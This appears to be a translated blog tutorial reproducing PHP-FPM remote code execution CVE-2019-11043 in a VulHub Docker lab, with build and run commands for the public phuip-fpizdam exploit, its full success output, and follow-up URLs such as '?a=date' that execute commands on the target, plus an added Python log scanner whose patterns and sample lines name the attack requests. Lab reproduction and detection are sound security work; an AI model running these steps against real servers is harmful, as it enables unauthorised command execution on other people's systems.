PHP Remote Code Execution Vulnerability CVE-2019-11043
PHP 5.4 is not affected; on PHP 5.6 and later the service crashes; on PHP 7.0 and later remote command execution is possible.
Vulnerability principle and introduction
https://www.freebuf.com/articles/web/217836.html
Setting up the vulnerable environment
Use the VulHub project to build the vulnerable environment with Docker.
Download and deploy the CVE-2019-11043 environment:
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043
# Git clone may fail; you can download the archive directly and extract it onto the target server. Here it is run directly inside the VulHub environment.
After entering the project directory, start the container:
docker-compose up -d
The target address is now reachable; the IP is the container's actual IP:
http://192.168.36.133:8080/index.php
# View container processes
docker ps
# Stop the container
docker stop <container ID>
Reproducing the vulnerability
Windows environment, with the Go toolchain installed
Download the POC: https://github.com/neex/phuip-fpizdam
Extract the project, run cmd as administrator, change into the project directory, and run go build there to compile the project.
After the build completes, run the resulting exe. The url argument is the vulnerable address; note that it must include the actual php file:
E:\Downloads\phuip-fpizdam-master>phuip-fpizdam.exe "http://192.168.36.133:8080/index.php"
A successful run looks like this:
E:\Downloads\phuip-fpizdam-master>phuip-fpizdam.exe "http://192.168.36.133:8080/index.php"
2019/11/08 16:40:46 Base status code is 200
2019/11/08 16:40:46 Status code 502 for qsl=1800, adding as a candidate
2019/11/08 16:40:46 The target is probably vulnerable. Possible QSLs: [1790 1795 1800]
2019/11/08 16:40:46 Attack params found: --qsl 1790 --pisos 35 --skip-detect
2019/11/08 16:40:46 Trying to set "session.auto_start=0"...
2019/11/08 16:40:46 Detect() returned attack params: --qsl 1790 --pisos 35 --skip-detect <-- REMEMBER THIS
2019/11/08 16:40:46 Performing attack using php.ini settings...
2019/11/08 16:40:46 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/11/08 16:40:46 Trying to cleanup /tmp/a...
2019/11/08 16:40:46 Done!
Once the attack succeeds, the target URL can be requested with a command parameter:
http://192.168.36.133:8080/index.php?a=date
The output of the command is echoed back on the page.
# Kali environment, with the Go toolchain installed
Download and install the Go toolchain:
apt-get install golang-go -y
Download the POC project:
git clone https://github.com/neex/phuip-fpizdam
Enter the downloaded project and run go build with no arguments to compile it.
# When building with no arguments, first make sure DNS resolution is reachable
After the build succeeds, run the POC to inject the payload and trigger the vulnerability:
./phuip-fpizdam http://192.168.36.81:8080/index.php
A successful run gives the following:
2019/11/08 03:55:23 Base status code is 200
2019/11/08 03:55:24 Status code 502 for qsl=1795, adding as a candidate
2019/11/08 03:55:24 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]
2019/11/08 03:55:24 Attack params found: --qsl 1790 --pisos 243 --skip-detect
2019/11/08 03:55:24 Trying to set "session.auto_start=0"...
2019/11/08 03:55:25 Detect() returned attack params: --qsl 1790 --pisos 243 --skip-detect <-- REMEMBER THIS
2019/11/08 03:55:25 Performing attack using php.ini settings...
2019/11/08 03:55:25 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/11/08 03:55:25 Trying to cleanup /tmp/a...
2019/11/08 03:55:25 Done!
Once the attack succeeds, the target URL can be requested with a command parameter:
http://192.168.36.133:8080/index.php?a=date
The output of the command is echoed back on the page.
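From the defender's side, a run like the one above leaves a recognisable trail in the web server's access log. The script below is an added example, not code from the original post or from the phuip-fpizdam project: it parses nginx "combined" format lines and flags the three request shapes involved, an encoded newline (%0a) inside the PATH_INFO of a .php URL (the condition CVE-2019-11043 depends on), the very long query strings answered with 502 during the tool's QSL probing, and a ?a= parameter carrying a command as in the success message. The log lines, IPs, the qsl threshold and the small recon-command word list are all constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# One nginx "combined" access-log line: ip - user [time] "METHOD uri PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Bare recon commands a "?a=<cmd>" follow-up typically carries (constructed list, extend as needed).
RECON_WORDS = {"id", "whoami", "date", "uname"}

def make_line(ip, uri, status, ua="Go-http-client/1.1"):
    return f'{ip} - - [08/Nov/2019:16:40:46 +0000] "GET {uri} HTTP/1.1" {status} 157 "-" "{ua}"'

# Constructed sample traffic (not captured from the page's lab): a normal hit, the tool's
# long-query probes, the post-exploitation "?a=" requests, and an unrelated benign request.
SAMPLE_LOG = [
    make_line("192.0.2.10", "/index.php", 200, "Mozilla/5.0"),
    make_line("192.0.2.10", "/index.php/x%0Ay.php?" + "Q" * 1800, 502),
    make_line("192.0.2.10", "/index.php/x%0Ay.php?" + "Q" * 1790, 200),
    make_line("192.0.2.10", "/index.php?a=/bin/sh+-c+'which+which'&", 200),
    make_line("192.0.2.10", "/index.php?a=date", 200),
    make_line("198.51.100.7", "/index.php?page=about&a=1", 200, "Mozilla/5.0"),
]

def indicators(entry, qsl_threshold=1500):
    """Return the CVE-2019-11043 indicators one request matches (empty list = nothing seen)."""
    uri, hits = entry["uri"], []
    query = urlsplit(uri).query
    if re.search(r"\.php/[^?]*%0[aA]", uri):          # encoded newline inside PATH_INFO
        hits.append("newline-in-path-info")
    if entry["status"] == "502" and len(query) >= qsl_threshold:
        hits.append("long-query-502")                  # the QSL probing phase (502 per qsl)
    m = re.search(r"(?:^|&)a=([^&]*)", query)
    if m:
        value = unquote(m.group(1).replace("+", " "))  # "a=/bin/sh+-c+..." -> "/bin/sh -c ..."
        if value.startswith("/bin/") or " -c " in value or value in RECON_WORDS:
            hits.append("command-in-query")
    return hits

def scan(lines):
    """Group indicators per source IP; only sources with at least one hit are reported."""
    report = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            report[entry["ip"]].update(indicators(entry))
    return {ip: sorted(hits) for ip, hits in report.items() if hits}
```

A single source showing all three indicators in sequence is the strongest signal; the long-query 502s alone also fire on some benign scanners, so treat them as a weaker hint on their own.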
References
Describes the discovery timeline and remediation advice
https://www.secpulse.com/archives/116482.html
Vulnerability reproduction and remediation advice
https://blog.csdn.net/qq_43342566/article/details/102733144
POC project site, Go version
https://github.com/neex/phuip-fpizdam
3 comments
How do I bookmark this article?
I think your article is really well written.
The blogger is amazing!!!